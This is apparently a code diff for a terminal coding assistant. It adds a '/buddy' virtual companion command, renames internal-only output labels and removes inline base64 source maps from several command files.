//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJuYW1lcyI6WyJSZWFjdCIsIkFnZW50c01lbnUiLCJUb29sVXNlQ29udGV4dCIsImdldFRvb2xzIiwiTG9jYWxKU1hDb21tYW5kT25Eb25lIiwiY2FsbCIsIm9uRG9uZSIsImNvbnRleHQiLCJQcm9taXNlIiwiUmVhY3ROb2RlIiwiYXBwU3RhdGUiLCJnZXRBcHBTdGF0ZSIsInBlcm1pc3Npb25Db250ZXh0IiwidG9vbFBlcm1pc3Npb25Db250ZXh0IiwidG9vbHMiXSwic291cmNlcyI6WyJhZ2VudHMudHN4Il0sInNvdXJjZXNDb250ZW50IjpbImltcG9ydCAqIGFzIFJlYWN0IGZyb20gJ3JlYWN0J1xuaW1wb3J0IHsgQWdlbnRzTWVudSB9IGZyb20gJy4uLy4uL2NvbXBvbmVudHMvYWdlbnRzL0FnZW50c01lbnUuanMnXG5pbXBvcnQgdHlwZSB7IFRvb2xVc2VDb250ZXh0IH0gZnJvbSAnLi4vLi4vVG9vbC5qcydcbmltcG9ydCB7IGdldFRvb2xzIH0gZnJvbSAnLi4vLi4vdG9vbHMuanMnXG5pbXBvcnQgdHlwZSB7IExvY2FsSlNYQ29tbWFuZE9uRG9uZSB9IGZyb20gJy4uLy4uL3R5cGVzL2NvbW1hbmQuanMnXG5cbmV4cG9ydCBhc3luYyBmdW5jdGlvbiBjYWxsKFxuICBvbkRvbmU6IExvY2FsSlNYQ29tbWFuZE9uRG9uZSxcbiAgY29udGV4dDogVG9vbFVzZUNvbnRleHQsXG4pOiBQcm9taXNlPFJlYWN0LlJlYWN0Tm9kZT4ge1xuICBjb25zdCBhcHBTdGF0ZSA9IGNvbnRleHQuZ2V0QXBwU3RhdGUoKVxuICBjb25zdCBwZXJtaXNzaW9uQ29udGV4dCA9IGFwcFN0YXRlLnRvb2xQZXJtaXNzaW9uQ29udGV4dFxuICBjb25zdCB0b29scyA9IGdldFRvb2xzKHBlcm1pc3Npb25Db250ZXh0KVxuXG4gIHJldHVybiA8QWdlbnRzTWVudSB0b29scz17dG9vbHN9IG9uRXhpdD17b25Eb25lfSAvPlxufVxuIl0sIm1hcHBpbmdzIjoiQUFBQSxPQUFPLEtBQUtBLEtBQUssTUFBTSxPQUFPO0FBQzlCLFNBQVNDLFVBQVUsUUFBUSx1Q0FBdUM7QUFDbEUsY0FBY0MsY0FBYyxRQUFRLGVBQWU7QUFDbkQsU0FBU0MsUUFBUSxRQUFRLGdCQUFnQjtBQUN6QyxjQUFjQyxxQkFBcUIsUUFBUSx3QkFBd0I7QUFFbkUsT0FBTyxlQUFlQyxJQUFJQSxDQUN4QkMsTUFBTSxFQUFFRixxQkFBcUIsRUFDN0JHLE9BQU8sRUFBRUwsY0FBYyxDQUN4QixFQUFFTSxPQUFPLENBQUNSLEtBQUssQ0FBQ1MsU0FBUyxDQUFDLENBQUM7RUFDMUIsTUFBTUMsUUFBUSxHQUFHSCxPQUFPLENBQUNJLFdBQVcsQ0FBQyxDQUFDO0VBQ3RDLE1BQU1DLGlCQUFpQixHQUFHRixRQUFRLENBQUNHLHFCQUFxQjtFQUN4RCxNQUFNQyxLQUFLLEdBQUdYLFFBQVEsQ0FBQ1MsaUJBQWlCLENBQUM7RUFFekMsT0FBTyxDQUFDLFVBQVUsQ0FBQyxLQUFLLENBQUMsQ0FBQ0UsS0FBSyxDQUFDLENBQUMsTUFBTSxDQUFDLENBQUNSLE1BQU0sQ0FBQyxHQUFHO0FBQ3JEIiwiaWdub3JlTGlzdCI6W119

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@@ -0,0 +1,185 @@
import type { LocalJSXCommandContext, LocalJSXCommandOnDone } from '../../types/command.js'
import { getGlobalConfig, saveGlobalConfig } from '../../utils/config.js'
import { companionUserId, getCompanion, rollWithSeed } from '../../buddy/companion.js'
import type { StoredCompanion } from '../../buddy/types.js'
import { COMMON_HELP_ARGS, COMMON_INFO_ARGS } from '../../constants/xml.js'
const NAME_PREFIXES = [
'Byte',
'Echo',
'Glint',
'Miso',
'Nova',
'Pixel',
'Rune',
'Static',
'Vector',
'Whisk',
] as const
const NAME_SUFFIXES = [
'bean',
'bit',
'bud',
'dot',
'ling',
'loop',
'moss',
'patch',
'puff',
'spark',
] as const
const PERSONALITIES = [
'Curious and quietly encouraging',
'A patient little watcher with strong debugging instincts',
'Playful, observant, and suspicious of flaky tests',
'Calm under pressure and fond of clean diffs',
'A tiny terminal gremlin who likes successful builds',
] as const
const PET_REACTIONS = [
'leans into the headpat',
'does a proud little bounce',
'emits a content beep',
'looks delighted',
'wiggles happily',
] as const
function hashString(s: string): number {
let h = 2166136261
for (let i = 0; i < s.length; i++) {
h ^= s.charCodeAt(i)
h = Math.imul(h, 16777619)
}
return h >>> 0
}
function pickDeterministic<T>(items: readonly T[], seed: string): T {
return items[hashString(seed) % items.length]!
}
function titleCase(s: string): string {
return s.charAt(0).toUpperCase() + s.slice(1)
}
function createStoredCompanion(): StoredCompanion {
const userId = companionUserId()
const { bones } = rollWithSeed(`${userId}:buddy`)
const prefix = pickDeterministic(NAME_PREFIXES, `${userId}:prefix`)
const suffix = pickDeterministic(NAME_SUFFIXES, `${userId}:suffix`)
const personality = pickDeterministic(PERSONALITIES, `${userId}:personality`)
return {
name: `${prefix}${suffix}`,
personality: `${personality}.`,
hatchedAt: Date.now(),
}
}
function setCompanionReaction(
context: LocalJSXCommandContext,
reaction: string | undefined,
pet = false,
): void {
context.setAppState(prev => ({
...prev,
companionReaction: reaction,
companionPetAt: pet ? Date.now() : prev.companionPetAt,
}))
}
function showHelp(onDone: LocalJSXCommandOnDone): void {
onDone(
'Usage: /buddy [status|mute|unmute]\n\nRun /buddy with no args to hatch your companion the first time, then pet it on later runs.',
{ display: 'system' },
)
}
export async function call(
onDone: LocalJSXCommandOnDone,
context: LocalJSXCommandContext,
args?: string,
): Promise<null> {
const arg = args?.trim().toLowerCase() ?? ''
if (COMMON_HELP_ARGS.includes(arg) || arg === '') {
const existing = getCompanion()
if (arg !== '' || existing) {
if (arg !== '') {
showHelp(onDone)
return null
}
}
}
if (COMMON_HELP_ARGS.includes(arg)) {
showHelp(onDone)
return null
}
if (COMMON_INFO_ARGS.includes(arg) || arg === 'status') {
const companion = getCompanion()
if (!companion) {
onDone('No buddy hatched yet. Run /buddy to hatch one.', {
display: 'system',
})
return null
}
onDone(
`${companion.name} is your ${titleCase(companion.rarity)} ${companion.species}. ${companion.personality}`,
{ display: 'system' },
)
return null
}
if (arg === 'mute' || arg === 'unmute') {
const muted = arg === 'mute'
saveGlobalConfig(current => ({
...current,
companionMuted: muted,
}))
if (muted) {
setCompanionReaction(context, undefined)
}
onDone(`Buddy ${muted ? 'muted' : 'unmuted'}.`, { display: 'system' })
return null
}
if (arg !== '') {
showHelp(onDone)
return null
}
let companion = getCompanion()
if (!companion) {
const stored = createStoredCompanion()
saveGlobalConfig(current => ({
...current,
companion: stored,
companionMuted: false,
}))
companion = {
...rollWithSeed(`${companionUserId()}:buddy`).bones,
...stored,
}
setCompanionReaction(
context,
`${companion.name} the ${companion.species} has hatched.`,
true,
)
onDone(
`${companion.name} the ${companion.species} is now your buddy. Run /buddy again to pet them.`,
{ display: 'system' },
)
return null
}
const reaction = `${companion.name} ${pickDeterministic(
PET_REACTIONS,
`${Date.now()}:${companion.name}`,
)}`
setCompanionReaction(context, reaction, true)
onDone(undefined, { display: 'skip' })
return null
}

View File

@@ -0,0 +1,12 @@
import type { Command } from '../../commands.js'
const buddy = {
type: 'local-jsx',
name: 'buddy',
description: 'Hatch, pet, and manage your Open Claude companion',
immediate: true,
argumentHint: '[status|mute|unmute|help]',
load: () => import('./buddy.js'),
} satisfies Command
export default buddy

File diff suppressed because one or more lines are too long

View File

@@ -4,4 +4,3 @@ import type { LocalJSXCommandCall } from '../../types/command.js';
export const call: LocalJSXCommandCall = async (onDone, context) => { export const call: LocalJSXCommandCall = async (onDone, context) => {
return <Settings onClose={onDone} context={context} defaultTab="Config" />; return <Settings onClose={onDone} context={context} defaultTab="Config" />;
}; };
//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJuYW1lcyI6WyJSZWFjdCIsIlNldHRpbmdzIiwiTG9jYWxKU1hDb21tYW5kQ2FsbCIsImNhbGwiLCJvbkRvbmUiLCJjb250ZXh0Il0sInNvdXJjZXMiOlsiY29uZmlnLnRzeCJdLCJzb3VyY2VzQ29udGVudCI6WyJpbXBvcnQgKiBhcyBSZWFjdCBmcm9tICdyZWFjdCdcbmltcG9ydCB7IFNldHRpbmdzIH0gZnJvbSAnLi4vLi4vY29tcG9uZW50cy9TZXR0aW5ncy9TZXR0aW5ncy5qcydcbmltcG9ydCB0eXBlIHsgTG9jYWxKU1hDb21tYW5kQ2FsbCB9IGZyb20gJy4uLy4uL3R5cGVzL2NvbW1hbmQuanMnXG5cbmV4cG9ydCBjb25zdCBjYWxsOiBMb2NhbEpTWENvbW1hbmRDYWxsID0gYXN5bmMgKG9uRG9uZSwgY29udGV4dCkgPT4ge1xuICByZXR1cm4gPFNldHRpbmdzIG9uQ2xvc2U9e29uRG9uZX0gY29udGV4dD17Y29udGV4dH0gZGVmYXVsdFRhYj1cIkNvbmZpZ1wiIC8+XG59XG4iXSwibWFwcGluZ3MiOiJBQUFBLE9BQU8sS0FBS0EsS0FBSyxNQUFNLE9BQU87QUFDOUIsU0FBU0MsUUFBUSxRQUFRLHVDQUF1QztBQUNoRSxjQUFjQyxtQkFBbUIsUUFBUSx3QkFBd0I7QUFFakUsT0FBTyxNQUFNQyxJQUFJLEVBQUVELG1CQUFtQixHQUFHLE1BQUFDLENBQU9DLE1BQU0sRUFBRUMsT0FBTyxLQUFLO0VBQ2xFLE9BQU8sQ0FBQyxRQUFRLENBQUMsT0FBTyxDQUFDLENBQUNELE1BQU0sQ0FBQyxDQUFDLE9BQU8sQ0FBQyxDQUFDQyxPQUFPLENBQUMsQ0FBQyxVQUFVLENBQUMsUUFBUSxHQUFHO0FBQzVFLENBQUMiLCJpZ25vcmVMaXN0IjpbXX0=

View File

@@ -199,13 +199,13 @@ function formatContextAsMarkdownTable(data: ContextData): string {
output += `\n` output += `\n`
} }
// System tools (ant-only) // System tools (internal-only)
if ( if (
systemTools && systemTools &&
systemTools.length > 0 && systemTools.length > 0 &&
process.env.USER_TYPE === 'ant' process.env.USER_TYPE === 'ant'
) { ) {
output += `### [ANT-ONLY] System Tools\n\n` output += `### [internal] System Tools\n\n`
output += `| Tool | Tokens |\n` output += `| Tool | Tokens |\n`
output += `|------|--------|\n` output += `|------|--------|\n`
for (const tool of systemTools) { for (const tool of systemTools) {
@@ -214,13 +214,13 @@ function formatContextAsMarkdownTable(data: ContextData): string {
output += `\n` output += `\n`
} }
// System prompt sections (ant-only) // System prompt sections (internal-only)
if ( if (
systemPromptSections && systemPromptSections &&
systemPromptSections.length > 0 && systemPromptSections.length > 0 &&
process.env.USER_TYPE === 'ant' process.env.USER_TYPE === 'ant'
) { ) {
output += `### [ANT-ONLY] System Prompt Sections\n\n` output += `### [internal] System Prompt Sections\n\n`
output += `| Section | Tokens |\n` output += `| Section | Tokens |\n`
output += `|---------|--------|\n` output += `|---------|--------|\n`
for (const section of systemPromptSections) { for (const section of systemPromptSections) {
@@ -288,9 +288,9 @@ function formatContextAsMarkdownTable(data: ContextData): string {
output += `\n` output += `\n`
} }
// Message breakdown (ant-only) // Message breakdown (internal-only)
if (messageBreakdown && process.env.USER_TYPE === 'ant') { if (messageBreakdown && process.env.USER_TYPE === 'ant') {
output += `### [ANT-ONLY] Message Breakdown\n\n` output += `### [internal] Message Breakdown\n\n`
output += `| Category | Tokens |\n` output += `| Category | Tokens |\n`
output += `|----------|--------|\n` output += `|----------|--------|\n`
output += `| Tool calls | ${formatTokens(messageBreakdown.toolCallTokens)} |\n` output += `| Tool calls | ${formatTokens(messageBreakdown.toolCallTokens)} |\n`

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@@ -16,7 +16,7 @@ export const call: LocalCommandCall = async () => {
} }
if (process.env.USER_TYPE === 'ant') { if (process.env.USER_TYPE === 'ant') {
value += `\n\n[ANT-ONLY] Showing cost anyway:\n ${formatTotalCost()}` value += `\n\n[internal-only] Showing cost anyway:\n ${formatTotalCost()}`
} }
return { type: 'text', value } return { type: 'text', value }
} }

View File

@@ -6,4 +6,3 @@ export async function call(onDone: (result?: string, options?: {
}) => void): Promise<React.ReactNode> { }) => void): Promise<React.ReactNode> {
return <DesktopHandoff onDone={onDone} />; return <DesktopHandoff onDone={onDone} />;
} }
//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJuYW1lcyI6WyJSZWFjdCIsIkNvbW1hbmRSZXN1bHREaXNwbGF5IiwiRGVza3RvcEhhbmRvZmYiLCJjYWxsIiwib25Eb25lIiwicmVzdWx0Iiwib3B0aW9ucyIsImRpc3BsYXkiLCJQcm9taXNlIiwiUmVhY3ROb2RlIl0sInNvdXJjZXMiOlsiZGVza3RvcC50c3giXSwic291cmNlc0NvbnRlbnQiOlsiaW1wb3J0IFJlYWN0IGZyb20gJ3JlYWN0J1xuaW1wb3J0IHR5cGUgeyBDb21tYW5kUmVzdWx0RGlzcGxheSB9IGZyb20gJy4uLy4uL2NvbW1hbmRzLmpzJ1xuaW1wb3J0IHsgRGVza3RvcEhhbmRvZmYgfSBmcm9tICcuLi8uLi9jb21wb25lbnRzL0Rlc2t0b3BIYW5kb2ZmLmpzJ1xuXG5leHBvcnQgYXN5bmMgZnVuY3Rpb24gY2FsbChcbiAgb25Eb25lOiAoXG4gICAgcmVzdWx0Pzogc3RyaW5nLFxuICAgIG9wdGlvbnM/OiB7IGRpc3BsYXk/OiBDb21tYW5kUmVzdWx0RGlzcGxheSB9LFxuICApID0+IHZvaWQsXG4pOiBQcm9taXNlPFJlYWN0LlJlYWN0Tm9kZT4ge1xuICByZXR1cm4gPERlc2t0b3BIYW5kb2ZmIG9uRG9uZT17b25Eb25lfSAvPlxufVxuIl0sIm1hcHBpbmdzIjoiQUFBQSxPQUFPQSxLQUFLLE1BQU0sT0FBTztBQUN6QixjQUFjQyxvQkFBb0IsUUFBUSxtQkFBbUI7QUFDN0QsU0FBU0MsY0FBYyxRQUFRLG9DQUFvQztBQUVuRSxPQUFPLGVBQWVDLElBQUlBLENBQ3hCQyxNQUFNLEVBQUUsQ0FDTkMsTUFBZSxDQUFSLEVBQUUsTUFBTSxFQUNmQyxPQUE0QyxDQUFwQyxFQUFFO0VBQUVDLE9BQU8sQ0FBQyxFQUFFTixvQkFBb0I7QUFBQyxDQUFDLEVBQzVDLEdBQUcsSUFBSSxDQUNWLEVBQUVPLE9BQU8sQ0FBQ1IsS0FBSyxDQUFDUyxTQUFTLENBQUMsQ0FBQztFQUMxQixPQUFPLENBQUMsY0FBYyxDQUFDLE1BQU0sQ0FBQyxDQUFDTCxNQUFNLENBQUMsR0FBRztBQUMzQyIsImlnbm9yZUxpc3QiOltdfQ==

View File

@@ -6,4 +6,3 @@ export const call: LocalJSXCommandCall = async (onDone, context) => {
} = await import('../../components/diff/DiffDialog.js'); } = await import('../../components/diff/DiffDialog.js');
return <DiffDialog messages={context.messages} onDone={onDone} />; return <DiffDialog messages={context.messages} onDone={onDone} />;
}; };
//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJuYW1lcyI6WyJSZWFjdCIsIkxvY2FsSlNYQ29tbWFuZENhbGwiLCJjYWxsIiwib25Eb25lIiwiY29udGV4dCIsIkRpZmZEaWFsb2ciLCJtZXNzYWdlcyJdLCJzb3VyY2VzIjpbImRpZmYudHN4Il0sInNvdXJjZXNDb250ZW50IjpbImltcG9ydCAqIGFzIFJlYWN0IGZyb20gJ3JlYWN0J1xuaW1wb3J0IHR5cGUgeyBMb2NhbEpTWENvbW1hbmRDYWxsIH0gZnJvbSAnLi4vLi4vdHlwZXMvY29tbWFuZC5qcydcblxuZXhwb3J0IGNvbnN0IGNhbGw6IExvY2FsSlNYQ29tbWFuZENhbGwgPSBhc3luYyAob25Eb25lLCBjb250ZXh0KSA9PiB7XG4gIGNvbnN0IHsgRGlmZkRpYWxvZyB9ID0gYXdhaXQgaW1wb3J0KCcuLi8uLi9jb21wb25lbnRzL2RpZmYvRGlmZkRpYWxvZy5qcycpXG4gIHJldHVybiA8RGlmZkRpYWxvZyBtZXNzYWdlcz17Y29udGV4dC5tZXNzYWdlc30gb25Eb25lPXtvbkRvbmV9IC8+XG59XG4iXSwibWFwcGluZ3MiOiJBQUFBLE9BQU8sS0FBS0EsS0FBSyxNQUFNLE9BQU87QUFDOUIsY0FBY0MsbUJBQW1CLFFBQVEsd0JBQXdCO0FBRWpFLE9BQU8sTUFBTUMsSUFBSSxFQUFFRCxtQkFBbUIsR0FBRyxNQUFBQyxDQUFPQyxNQUFNLEVBQUVDLE9BQU8sS0FBSztFQUNsRSxNQUFNO0lBQUVDO0VBQVcsQ0FBQyxHQUFHLE1BQU0sTUFBTSxDQUFDLHFDQUFxQyxDQUFDO0VBQzFFLE9BQU8sQ0FBQyxVQUFVLENBQUMsUUFBUSxDQUFDLENBQUNELE9BQU8sQ0FBQ0UsUUFBUSxDQUFDLENBQUMsTUFBTSxDQUFDLENBQUNILE1BQU0sQ0FBQyxHQUFHO0FBQ25FLENBQUMiLCJpZ25vcmVMaXN0IjpbXX0=

View File

@@ -4,4 +4,3 @@ import type { LocalJSXCommandCall } from '../../types/command.js';
export const call: LocalJSXCommandCall = (onDone, _context, _args) => { export const call: LocalJSXCommandCall = (onDone, _context, _args) => {
return Promise.resolve(<Doctor onDone={onDone} />); return Promise.resolve(<Doctor onDone={onDone} />);
}; };
//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJuYW1lcyI6WyJSZWFjdCIsIkRvY3RvciIsIkxvY2FsSlNYQ29tbWFuZENhbGwiLCJjYWxsIiwib25Eb25lIiwiX2NvbnRleHQiLCJfYXJncyIsIlByb21pc2UiLCJyZXNvbHZlIl0sInNvdXJjZXMiOlsiZG9jdG9yLnRzeCJdLCJzb3VyY2VzQ29udGVudCI6WyJpbXBvcnQgUmVhY3QgZnJvbSAncmVhY3QnXG5pbXBvcnQgeyBEb2N0b3IgfSBmcm9tICcuLi8uLi9zY3JlZW5zL0RvY3Rvci5qcydcbmltcG9ydCB0eXBlIHsgTG9jYWxKU1hDb21tYW5kQ2FsbCB9IGZyb20gJy4uLy4uL3R5cGVzL2NvbW1hbmQuanMnXG5cbmV4cG9ydCBjb25zdCBjYWxsOiBMb2NhbEpTWENvbW1hbmRDYWxsID0gKG9uRG9uZSwgX2NvbnRleHQsIF9hcmdzKSA9PiB7XG4gIHJldHVybiBQcm9taXNlLnJlc29sdmUoPERvY3RvciBvbkRvbmU9e29uRG9uZX0gLz4pXG59XG4iXSwibWFwcGluZ3MiOiJBQUFBLE9BQU9BLEtBQUssTUFBTSxPQUFPO0FBQ3pCLFNBQVNDLE1BQU0sUUFBUSx5QkFBeUI7QUFDaEQsY0FBY0MsbUJBQW1CLFFBQVEsd0JBQXdCO0FBRWpFLE9BQU8sTUFBTUMsSUFBSSxFQUFFRCxtQkFBbUIsR0FBR0MsQ0FBQ0MsTUFBTSxFQUFFQyxRQUFRLEVBQUVDLEtBQUssS0FBSztFQUNwRSxPQUFPQyxPQUFPLENBQUNDLE9BQU8sQ0FBQyxDQUFDLE1BQU0sQ0FBQyxNQUFNLENBQUMsQ0FBQ0osTUFBTSxDQUFDLEdBQUcsQ0FBQztBQUNwRCxDQUFDIiwiaWdub3JlTGlzdCI6W119

File diff suppressed because one or more lines are too long

View File

@@ -30,4 +30,3 @@ export async function call(onDone: LocalJSXCommandOnDone): Promise<React.ReactNo
await gracefulShutdown(0, 'prompt_input_exit'); await gracefulShutdown(0, 'prompt_input_exit');
return null; return null;
} }
//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJuYW1lcyI6WyJmZWF0dXJlIiwic3Bhd25TeW5jIiwic2FtcGxlIiwiUmVhY3QiLCJFeGl0RmxvdyIsIkxvY2FsSlNYQ29tbWFuZE9uRG9uZSIsImlzQmdTZXNzaW9uIiwiZ3JhY2VmdWxTaHV0ZG93biIsImdldEN1cnJlbnRXb3JrdHJlZVNlc3Npb24iLCJHT09EQllFX01FU1NBR0VTIiwiZ2V0UmFuZG9tR29vZGJ5ZU1lc3NhZ2UiLCJjYWxsIiwib25Eb25lIiwiUHJvbWlzZSIsIlJlYWN0Tm9kZSIsInN0ZGlvIiwic2hvd1dvcmt0cmVlIl0sInNvdXJjZXMiOlsiZXhpdC50c3giXSwic291cmNlc0NvbnRlbnQiOlsiaW1wb3J0IHsgZmVhdHVyZSB9IGZyb20gJ2J1bjpidW5kbGUnXG5pbXBvcnQgeyBzcGF3blN5bmMgfSBmcm9tICdjaGlsZF9wcm9jZXNzJ1xuaW1wb3J0IHNhbXBsZSBmcm9tICdsb2Rhc2gtZXMvc2FtcGxlLmpzJ1xuaW1wb3J0ICogYXMgUmVhY3QgZnJvbSAncmVhY3QnXG5pbXBvcnQgeyBFeGl0RmxvdyB9IGZyb20gJy4uLy4uL2NvbXBvbmVudHMvRXhpdEZsb3cuanMnXG5pbXBvcnQgdHlwZSB7IExvY2FsSlNYQ29tbWFuZE9uRG9uZSB9IGZyb20gJy4uLy4uL3R5cGVzL2NvbW1hbmQuanMnXG5pbXBvcnQgeyBpc0JnU2Vzc2lvbiB9IGZyb20gJy4uLy4uL3V0aWxzL2NvbmN1cnJlbnRTZXNzaW9ucy5qcydcbmltcG9ydCB7IGdyYWNlZnVsU2h1dGRvd24gfSBmcm9tICcuLi8uLi91dGlscy9ncmFjZWZ1bFNodXRkb3duLmpzJ1xuaW1wb3J0IHsgZ2V0Q3VycmVudFdvcmt0cmVlU2Vzc2lvbiB9IGZyb20gJy4uLy4uL3V0aWxzL3dvcmt0cmVlLmpzJ1xuXG5jb25zdCBHT09EQllFX01FU1NBR0VTID0gWydHb29kYnllIScsICdTZWUgeWEhJywgJ0J5ZSEnLCAnQ2F0Y2ggeW91IGxhdGVyISddXG5cbmZ1bmN0aW9uIGdldFJhbmRvbUdvb2RieWVNZXNzYWdlKCk6IHN0cmluZyB7XG4gIHJldHVybiBzYW1wbGUoR09PREJZRV9NRVNTQUdFUykgPz8gJ0dvb2RieWUhJ1xufVxuXG5leHBvcnQgYXN5bmMgZnVuY3Rpb24gY2FsbChcbiAgb25Eb25lOiBMb2NhbEpTWENvbW1hbmRPbkRvbmUsXG4pOiBQcm9taXNlPFJlYWN0LlJlYWN0Tm9kZT4ge1xuICAvLyBJbnNpZGUgYSBgY2xhdWRlIC0tYmdgIHRtdXggc2Vzc2lvbjogZGV0YWNoIGluc3RlYWQgb2Yga2lsbC4gVGhlIFJFUExcbiAgLy8ga2VlcHMgcnVubmluZzsgYGNsYXVkZSBhdHRhY2hgIGNhbiByZWNvbm5lY3QuIENvdmVycyAvZXhpdCwgL3F1aXQsXG4gIC8vIGN0cmwrYywgY3RybCtkIOKAlCBhbGwgZnVubmVsIHRocm91Z2ggaGVyZSB2aWEgUkVQTCdzIGhhbmRsZUV4aXQuXG4gIGlmIChmZWF0dXJlKCdCR19TRVNTSU9OUycpICYmIGlzQmdTZXNzaW9uKCkpIHtcbiAgICBvbkRvbmUoKVxuICAgIHNwYXduU3luYygndG11eCcsIFsnZGV0YWNoLWNsaWVudCddLCB7IHN0ZGlvOiAnaWdub3JlJyB9KVxuICAgIHJldHVybiBudWxsXG4gIH1cblxuICBjb25zdCBzaG93V29ya3RyZWUgPSBnZXRDdXJyZW50V29ya3RyZWVTZXNzaW9uKCkgIT09IG51bGxcblxuICBpZiAoc2hvd1dvcmt0cmVlKSB7XG4gICAgcmV0dXJuIChcbiAgICAgIDxFeGl0Rmxvd1xuICAgICAgICBzaG93V29ya3RyZWU9e3Nob3dXb3JrdHJlZX1cbiAgICAgICAgb25Eb25lPXtvbkRvbmV9XG4gICAgICAgIG9uQ2FuY2VsPXsoKSA9PiBvbkRvbmUoKX1cbiAgICAgIC8+XG4gICAgKVxuICB9XG5cbiAgb25Eb25lKGdldFJhbmRvbUdvb2RieWVNZXNzYWdlKCkpXG4gIGF3YWl0IGdyYWNlZnVsU2h1dGRvd24oMCwgJ3Byb21wdF9pbnB1dF9leGl0JylcbiAgcmV0dXJuIG51bGxcbn1cbiJdLCJtYXBwaW5ncyI6IkFBQUEsU0FBU0EsT0FBTyxRQUFRLFlBQVk7QUFDcEMsU0FBU0MsU0FBUyxRQUFRLGVBQWU7QUFDekMsT0FBT0MsTUFBTSxNQUFNLHFCQUFxQjtBQUN4QyxPQUFPLEtBQUtDLEtBQUssTUFBTSxPQUFPO0FBQzlCLFNBQVNDLFFBQVEsUUFBUSw4QkFBOEI7QUFDdkQsY0FBY0MscUJBQXFCLFFBQVEsd0JBQXdCO0FBQ25FLFNBQVNDLFdBQVcsUUFBUSxtQ0FBbUM7QUFDL0QsU0FBU0MsZ0JBQWdCLFFBQVEsaUNBQWlDO0FBQ2xFLFNBQVNDLHlCQUF5QixRQUFRLHlCQUF5QjtBQUVuRSxNQUFNQyxnQkFBZ0IsR0FBRyxDQUFDLFVBQVUsRUFBRSxTQUFTLEVBQUUsTUFBTSxFQUFFLGtCQUFrQixDQUFDO0FBRTVFLFNBQVNDLHVCQUF1QkEsQ0FBQSxDQUFFLEVBQUUsTUFBTSxDQUFDO0VBQ3pDLE9BQU9SLE1BQU0sQ0FBQ08sZ0JBQWdCLENBQUMsSUFBSSxVQUFVO0FBQy9DO0FBRUEsT0FBTyxlQUFlRSxJQUFJQSxDQUN4QkMsTUFBTSxFQUFFUCxxQkFBcUIsQ0FDOUIsRUFBRVEsT0FBTyxDQUFDVixLQUFLLENBQUNXLFNBQVMsQ0FBQyxDQUFDO0VBQzFCO0VBQ0E7RUFDQTtFQUNBLElBQUlkLE9BQU8sQ0FBQyxhQUFhLENBQUMsSUFBSU0sV0FBVyxDQUFDLENBQUMsRUFBRTtJQUMzQ00sTUFBTSxDQUFDLENBQUM7SUFDUlgsU0FBUyxDQUFDLE1BQU0sRUFBRSxDQUFDLGVBQWUsQ0FBQyxFQUFFO01BQUVjLEtBQUssRUFBRTtJQUFTLENBQUMsQ0FBQztJQUN6RCxPQUFPLElBQUk7RUFDYjtFQUVBLE1BQU1DLFlBQVksR0FBR1IseUJBQXlCLENBQUMsQ0FBQyxLQUFLLElBQUk7RUFFekQsSUFBSVEsWUFBWSxFQUFFO0lBQ2hCLE9BQ0UsQ0FBQyxRQUFRLENBQ1AsWUFBWSxDQUFDLENBQUNBLFlBQVksQ0FBQyxDQUMzQixNQUFNLENBQUMsQ0FBQ0osTUFBTSxDQUFDLENBQ2YsUUFBUSxDQUFDLENBQUMsTUFBTUEsTUFBTSxDQUFDLENBQUMsQ0FBQyxHQUN6QjtFQUVOO0VBRUFBLE1BQU0sQ0FBQ0YsdUJBQXVCLENBQUMsQ0FBQyxDQUFDO0VBQ2pDLE1BQU1ILGdCQUFnQixDQUFDLENBQUMsRUFBRSxtQkFBbUIsQ0FBQztFQUM5QyxPQUFPLElBQUk7QUFDYiIsImlnbm9yZUxpc3QiOltdfQ==

File diff suppressed because one or more lines are too long

View File

@@ -14,4 +14,3 @@ export async function call(onDone: LocalJSXCommandOnDone, context: LocalJSXComma
onDone(success ? 'Login successful' : 'Login interrupted'); onDone(success ? 'Login successful' : 'Login interrupted');
}} />; }} />;
} }
//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJuYW1lcyI6WyJSZWFjdCIsIkxvY2FsSlNYQ29tbWFuZENvbnRleHQiLCJMb2NhbEpTWENvbW1hbmRPbkRvbmUiLCJMb2dpbiIsInJ1bkV4dHJhVXNhZ2UiLCJjYWxsIiwib25Eb25lIiwiY29udGV4dCIsIlByb21pc2UiLCJSZWFjdE5vZGUiLCJyZXN1bHQiLCJ0eXBlIiwidmFsdWUiLCJzdWNjZXNzIiwib25DaGFuZ2VBUElLZXkiXSwic291cmNlcyI6WyJleHRyYS11c2FnZS50c3giXSwic291cmNlc0NvbnRlbnQiOlsiaW1wb3J0IFJlYWN0IGZyb20gJ3JlYWN0J1xuaW1wb3J0IHR5cGUgeyBMb2NhbEpTWENvbW1hbmRDb250ZXh0IH0gZnJvbSAnLi4vLi4vY29tbWFuZHMuanMnXG5pbXBvcnQgdHlwZSB7IExvY2FsSlNYQ29tbWFuZE9uRG9uZSB9IGZyb20gJy4uLy4uL3R5cGVzL2NvbW1hbmQuanMnXG5pbXBvcnQgeyBMb2dpbiB9IGZyb20gJy4uL2xvZ2luL2xvZ2luLmpzJ1xuaW1wb3J0IHsgcnVuRXh0cmFVc2FnZSB9IGZyb20gJy4vZXh0cmEtdXNhZ2UtY29yZS5qcydcblxuZXhwb3J0IGFzeW5jIGZ1bmN0aW9uIGNhbGwoXG4gIG9uRG9uZTogTG9jYWxKU1hDb21tYW5kT25Eb25lLFxuICBjb250ZXh0OiBMb2NhbEpTWENvbW1hbmRDb250ZXh0LFxuKTogUHJvbWlzZTxSZWFjdC5SZWFjdE5vZGUgfCBudWxsPiB7XG4gIGNvbnN0IHJlc3VsdCA9IGF3YWl0IHJ1bkV4dHJhVXNhZ2UoKVxuXG4gIGlmIChyZXN1bHQudHlwZSA9PT0gJ21lc3NhZ2UnKSB7XG4gICAgb25Eb25lKHJlc3VsdC52YWx1ZSlcbiAgICByZXR1cm4gbnVsbFxuICB9XG5cbiAgcmV0dXJuIChcbiAgICA8TG9naW5cbiAgICAgIHN0